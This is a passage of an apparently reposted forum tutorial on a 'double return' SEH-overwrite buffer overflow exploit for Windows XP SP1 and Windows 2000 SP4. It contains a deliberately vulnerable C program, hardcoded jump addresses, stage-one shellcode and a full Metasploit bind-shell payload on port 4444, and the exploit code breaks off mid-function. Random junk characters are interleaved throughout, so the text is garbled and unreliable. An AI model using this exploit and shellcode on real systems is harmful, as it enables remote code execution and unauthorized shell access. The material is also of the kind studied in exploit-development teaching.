The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well. 1 ~( c" B1 @ |' e/ m/ C) V' H1 ?. [4 F, r
[Buf] <- Shellcode2 j. w$ B; \/ t. ?* q, U' d# R4 V
[Return Address] <- jmp register (for Windows XP sp1)1 Y' @, p& r6 t: [. Q. P
[Various Stack Data] <- Junk& |9 `: @% B$ n) g9 ]6 y8 r; \3 }
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward / h; O/ K1 y. R[SE Handler] <- jmp register (for Win2k sp4) 8 t6 Z0 R. g7 D$ F# Y6 {6 _9 v# \[Stage1 Shellcode] <- stage1 shellcode for win2k 8 _& w% j j4 y- z6 y9 p# o; M ( e2 a7 J2 f$ V1 U% U9 u8 jIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses ; o0 c4 D. R4 Q& l! x1 k. B/ r$ C" G* t2 B* l, Y
Necessary Tools:( ^8 f" j4 j' Z6 Z% i) R9 M0 A! e
- OllyDBG - t& n; d% @0 \/ f& D- b- C/C++ Compiler1 Y4 I9 o9 A9 O
- nasm, b \; ?: h" \, x/ l
- Sac 7 B$ H% n4 E) f9 Y: T: Q! Q; e" S# A; a
Vulnerable Code: 4 C$ ~$ Z" K8 X7 `2 }7 a//lamebuf.c1 n. ~2 ~4 l8 }8 O
#include<stdio.h> . V- W! j) M" N" m#include<string.h>- F% G/ E% \* {3 T6 J7 c$ B
#include<windows.h> 2 B d/ e& r; ^* j$ w+ Fint main(int argc,char *argv[]){# N( c/ q' U4 L
& N1 T8 _ N$ T1 I& I, Nchar buf[512];5 S3 r, J. u0 r3 D( i9 P) A
char buf1[1024]; // <- simulate a stack m! \' v. H: f
//DebugBreak(); 0 E2 P* ~7 b! Bif (argc != 2){ return -1; }; H5 h8 O/ }( P' ]3 m! u
/ D0 q6 L6 A; q0 |6 K% F% S4 k+ t. v
strcpy(buf,argv[1]); 5 D J' ]* P5 s) M( a& Greturn 0x0;2 }% j2 d: n* }
} % f% U2 e+ {2 y& c' i" i& h& |" z2 [. M0 a! l
Getting Started:+ b$ U1 F' z: b5 `) x# _
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers: 3 v) V, M3 p/ I( k0 h2 g/ y9 h+ q5 S" t0 ?* b
EAX 00000000 / y( \7 o: V1 o0 m/ `ECX 00321404 8 d) Y1 w2 w/ }: U+ S) @- ~EDX 00414141 ) _1 i) ? G& NEBX 7FFDF000 5 [+ p1 A/ c" K) N8 X3 K5 j$ |ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 3 S7 [ j e6 h7 l: V5 _5 wEBP 41414141 1 B0 b; d! m/ G0 nESI 77D4595F8 ?" L/ @0 ?# F+ B. w
EDI 77F59037 ntdll.77F59037& z9 `* q, f5 [- ~& A4 L `7 |( f
EIP 41414141 O1 G" c' k* y9 S
k! b$ \0 h4 i% `8 t( ?( i
Lets take a look at the stack and see what happened to the default exception handler: & q/ w0 j+ T3 r- b' [* u* y0x0012FFB0 41414141 Pointer to next SEH Record/ t0 {7 E" ^( T6 N+ f9 t* B
0x0012FFB4 41414141 SE Handler$ J: {. ` o. O
+ D, f2 a& }6 J8 sWe successfully overwrote the return address and the default exception handler. 6 W% u$ q2 r! O& q1 C , l+ b7 I7 T/ M3 H9 BPrimary Return Address (Windows XP SP1 EN):' S2 D: Y, I" V$ t2 v [
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: * Z+ y, z9 ]8 w4 a"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"% r% a, G) S5 W/ O% X$ m
$ F0 R' d+ {3 f6 L/ m1 O2 K) W
Secondary Return Address (Windows 2000 SP4 EN):- e2 ]3 c% E. f$ j9 M% h$ {
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: , U( `# i# m: w: h% E' N5 T"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1" . S% ^$ K6 d- ]3 h3 |8 U6 t( U) a' w, x3 K" l( ?( m4 T' |% v# P, L- F& \
Proof Of Concept:9 T3 t& X$ X' j: l* U& V/ E1 g
// exploit.c 2 |/ j! u; r; {) [. w; R8 p8 F// Tal zeltzer - [Double Return] //8 z1 z1 e" n/ C3 ]% U. s6 s& a
5 Q3 ?' T+ O- X
#include<stdio.h>1 Y& ?3 [& P! P
#include<string.h> / X# R7 }+ ^( \/ o5 y#include<windows.h>% U( H' e2 V7 J7 l8 f" y
( y! H1 ^ b6 r O4 {: o#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp$ m2 ?, f1 w3 @
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx ) ]( H" t# r, }/ Y, Q* k. W% [+ w0 u# x6 v( k; n' X. N p
// Stage1 For WinXP Sp1 English % t. h7 i) h c* K$ Eunsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; & {! e8 W$ h0 [$ d. s7 ^, _ - }) u3 m; U- A2 y// Stage1 For Win2k Sp4 English$ R3 a# k) B* Y) s
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; % X; }, T# N6 i5 z4 r7 I 3 ]' w0 a+ f+ u; C& n2 _" `- u// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com! b( Q3 {0 b4 O! F
unsigned char shellcode[] = - E4 n# T- n% d& x"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"# C* C+ A) O' b; ~ H5 E8 H6 @
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19" 2 x& `* I4 E$ A+ [( e/ `8 G- D"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"/ |. f8 F v* }$ t: k' F5 U2 a+ P
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"' T8 G' r( j3 ?6 g
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" # Y! A8 u; _! }6 g"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15" 6 {% {2 y4 T, P+ P; k& S, R"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14" * _ w6 r/ e; @"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"6 ]* a5 q' l+ _, e
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" + t1 ^( {3 B4 w# { j& s8 l"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"/ O& B( V. [; @1 R
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"1 O! t& H- W3 I8 J7 e" }8 H
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" - Z7 d1 s9 \" @8 ^"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"& W. j4 V8 k c. `6 Q% K8 V
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"* A) n0 W, g H! J |! K6 Q
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f". W4 k- l. C& o7 w3 I d0 U
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" ( ^7 e/ R2 W% P a) \. L"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" 4 B+ G; h1 ]) E8 o"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"6 }+ M; R" N! e3 V% b0 v
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"7 g5 f9 w0 o3 h( l+ |0 @2 J
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" 5 Y. Y$ S* X/ e0 S8 `; M2 w"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"$ a# q5 E% E O4 j
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" & l0 m; N" R' h" a1 \- _+ D"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" - x; G6 X1 N% U; N- Q% c% I P0 K"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"9 h% K8 u0 `6 I u/ ~# ?3 J
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 7 U; l' Z* K$ I) K & @; l" O8 t$ Y" V7 Z% Q4 y 5 r4 x7 T1 F0 f2 w* Dint main(int argc,char *argv[]){/ V% S. ?: d% C/ y1 y8 z4 \
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
